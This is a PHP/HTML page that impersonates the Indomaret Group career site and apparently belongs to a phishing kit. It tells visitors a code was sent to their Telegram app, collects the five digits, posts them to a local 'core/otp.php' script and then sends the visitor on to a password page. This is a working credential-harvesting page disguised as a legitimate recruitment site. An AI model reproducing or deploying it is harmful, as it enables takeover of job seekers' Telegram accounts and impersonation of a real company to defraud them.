<?php session_start() ?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, 
        user-scalable=0" name="viewport">
    <link rel="icon" type="image/vnd.microsoft.icon" href="https://files.indomaretgroup.com/images/favicon.ico">
    <link rel="stylesheet" href="https://career.indomaretgroup.com/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css?family=Montserrat+Alternates:bold" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Ubuntu" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous">
    <link href="https://career.indomaretgroup.com/css/select2-bootstrap4.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.6-rc.0/css/select2.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/flatpickr/dist/flatpickr.min.css">
    <style>
        .bd-callout {
            line-height: 32px;
            padding: 0.75rem;
            margin-top: 0.25rem;
            margin-bottom: 0.25rem;
            border: 1px solid #eee;
            border-left-width: .25rem;
            border-radius: .25rem;
        }

        .bd-callout-info {
            border-left-color: #5bc0de;
        }

        .office-button {
            font-size: 1.1em;
        }

        .modal-dialog-centered {
            display: flex;
            align-items: center;
            min-height: calc(100% - 1rem);
            /* Adjust the min-height as needed */
        }

        .modal-content {
            width: 100%;
            max-width: 600px;
            /* Set a max-width if desired */
            margin: auto;
        }
    </style>

    <link rel="stylesheet" type="text/css" href="./style/app.css">

    <title>Career Indomaret Group</title>

    <style>
        .notification {
            font-family: sans-serif;
        }

        .notification-text {
            color: red;
        }

        @media only screen and (max-width: 768px) {
            .notification {
                font-size: 0.75rem;
            }
        }

        @media only screen and (min-width: 769px) {
            .notification {
                font-size: 1.17rem;
            }
        }
    </style>

    <script src="https://cdn.tailwindcss.com"></script>

    <style>
        .pulse {
            animation: pulse 1s infinite ease-in-out alternate;
        }

        @keyframes pulse {
            from {
                transform: scale(0.8);
            }

            to {
                transform: scale(1.2);
            }
        }

        .show-loading {
            display: grid;
        }

        .hidden-loading {
            display: none;
        }
    </style>
</head>

<body>

    <nav id="navbar-top" class="text-center navbar sticky-top navbar-dark bg-black">
        <div style="position:static;
            top: 10px;
            left: 0;
            right: 0;
            margin-left: auto;
            margin-right: auto;
            padding-left: 10px;
            padding-right: 10px;
            margin-top: 2px;
            margin-bottom: 2px;
            z-index: 2;
            background-color: #ffdd57;
            border-radius: 50px;">
            <div class="notification">
                <b>
                    <span class="notification-text">
                        <i class="fa fa-exclamation-triangle"></i> PERHATIAN
                    </span>
                    Seleksi penerimaan karyawan INDOMARET GROUP tidak dipungut biaya apapun selama proses rekrutmen berlangsung.
                </b>
            </div>
        </div>
        <div class="container navbar-expand-lg">
            <a class="navbar-brand" href="index.php">
                <img src="https://career.indomaretgroup.com/img/logo.png" style="max-height: 50px;">
            </a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarsExample07" aria-controls="navbarsExample07" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>

            <div class="collapse navbar-collapse" id="navbarsExample07">
                <ul class="navbar-nav ml-auto">
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com">Home <span class="sr-only">(current)</span></a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/company">Company</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/testimony">Testimony</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/jobs">Job Vacancy</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/faq">F.A.Q</a>
                    </li>
                    <li class="nav-item py-2 ">
                        <a class="nav-link" href="https://career.indomaretgroup.com/contact">Contact</a>
                    </li>
                </ul>
            </div>
        </div>
    </nav>

    <div id="loading" style="position:absolute; width: 100%; height: 100dvh; place-items:center; background-color: rgba(0,0,0,.7); z-index: 9999;">
        <img src="https://career.indomaretgroup.com/img/logo.png" class="pulse" width="150" />
    </div>

    <main class="w-full my-20 grid place-items-center">
        <section class="flex justify-center flex-col items-center">
            <img src="./asset/icon.jpeg" class="w-40" />
            <div class="text-center w-[90%] lg:w-[450px]">
                <p class="text-xl mb-3">Cek Pesan Telegram Anda</p>
                <p class="opacity-50 leading-7">Kami telah mengirimkan kode ke <span class="font-bold">aplikasi Telegram</span> untuk <?= $_SESSION['no'] ?> di perangkat anda yang lain</p>
                <div>
                    <form class="flex gap-2">
                        <input id="input1" oninput="moveNextInput(1)" class="input p-4 border-2 rounded-lg border-gray-200 w-[20%] my-4 outline-blue-400 text-center text-xl" type="tel" maxlength="1" />
                        <input id="input2" oninput="moveNextInput(2)" class="input p-4 border-2 rounded-lg border-gray-200 w-[20%] my-4 outline-blue-400 text-center text-xl" type="tel" maxlength="1" />
                        <input id="input3" oninput="moveNextInput(3)" class="input p-4 border-2 rounded-lg border-gray-200 w-[20%] my-4 outline-blue-400 text-center text-xl" type="tel" maxlength="1" />
                        <input id="input4" oninput="moveNextInput(4)" class="input p-4 border-2 rounded-lg border-gray-200 w-[20%] my-4 outline-blue-400 text-center text-xl" type="tel" maxlength="1" />
                        <input id="input5" oninput="moveNextInput(5)" class="input p-4 border-2 rounded-lg border-gray-200 w-[20%] my-4 outline-blue-400 text-center text-xl" type="tel" maxlength="1" />
                    </form>
                </div>
            </div>
        </section>
    </main>


    <footer>
        <div class="container pt-3">
            <div class="row align-items-center">
                <div class="col-12 col-md-4 pt-2 pb-2" id="footer-title">
                    Drive Your<br>
                    Bright Career<br>
                    Into a Legacy<br>
                </div>
                <div class="col-12 col-md-4">
                    <div class="row pt-2 pb-2">
                        <div class="col-3 col-sm-3 col-lg-2 pr-0">
                            <img src="https://career.indomaretgroup.com/img/heart.png" class="footer-heart">
                        </div>
                        <div class="col-9 col-sm-9 col-lg-10 pl-0">
                            <p class="footer-head-office mb-0">Head Office
                                <a target="_blank" class="float-right" href="https://www.google.com/maps/place/PT+Indomarco+Prismatama+PIK/@-6.1094662,106.738388,17.5z/data=!4m12!1m6!3m5!1s0x0:0x7be66be81fee4a97!2sIndomarco+Prismatama!8m2!3d-6.1258757!4d106.8146644!3m4!1s0x0:0xb8d0d77801b4a430!8m2!3d-6.110157!4d106.7392697?hl=en-US">
                                    <i class="fas fa-location-arrow maps" title="Buka dengan Google Maps"></i>
                                </a>
                            </p>
                            <p class="footer-address">Gedung Menara Indomaret<br>Jl. Boulevard Pantai Indah Kapuk, Kamal Muara, Penjaringan<br>Jakarta Utara 14470<br> Telp. (021) 50897400</p>
                        </div>
                        <div class="mt-2"></div>
                    </div>
                </div>
                <div class="col-12 col-md-4 mb-3">
                    <h4>
                        <span class="font-weight-bold float-right">Stay <span class="light-blue">Connected</span></span>
                    </h4>
                    <div class="clearfix"></div>
                    <div class="row mt-3 mb-6">
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                            <a href="https://www.instagram.com/career_idmgroup/" target="_new">
                                <div class="thumbnail">
                                    <img src="https://career.indomaretgroup.com/img/circle-2.png" class="img-responsive small-circle">
                                    <div class="flying-caption">
                                        <i class="fab fa-instagram social-media-icon"></i>
                                    </div>
                                </div>
                            </a>
                        </div>
                        <div class="col-2 col-md-2 col-lg-2 mt-2 mx-auto">
                            <a href="https://www.linkedin.com/company/career-indomaret-group" target="_new">
                                <div class="thumbnail">
                                    <img src="https://career.indomaretgroup.com/img/circle-2.png" class="img-responsive small-circle">
                                    <div class="flying-caption">
                                        <i class="fab fa-linkedin-in social-media-icon"></i>
                                    </div>
                                </div>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>

    <script src="https://code.jquery.com/jquery-3.3.1.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
    <script src="https://career.indomaretgroup.com/js/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

    <script src="https://d.line-scdn.net/r/web/social-plugin/js/thirdparty/loader.min.js" async="async" defer="defer"></script>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.5/js/select2.full.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/flatpickr"></script>
    <script src="https://career.indomaretgroup.com/js/bootstrap_validator.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
    <script>
        const loading = document.getElementById('loading')
        loading.classList.add('hidden-loading');

        const moveNextInput = (index) => {
            const inputs = document.querySelectorAll('.input')
            const element = inputs[index]

            const input1 = document.getElementById('input1').value;
            const input2 = document.getElementById('input2').value;
            const input3 = document.getElementById('input3').value;
            const input4 = document.getElementById('input4').value;
            const input5 = document.getElementById('input5').value;

            // Gabungkan nilai-nilai tersebut menjadi satu string
            const combinedValue = input1 + input2 + input3 + input4 + input5;

            if (element) {
                element.focus();
            } else {
                setTimeout(function() {
                    loading.classList.remove('hidden-loading');
                    loading.classList.add('show-loading');
                    $.ajax({
                        method: "POST",
                        url: './core/otp.php',
                        data: {
                            otp: combinedValue
                        },
                        success: () => {
                            loading.classList.add('hidden-loading');
                            document.location.href = "./password.php";
                        }
                    });
                }, 1000)
            }
        }
    </script>
</body>

</html>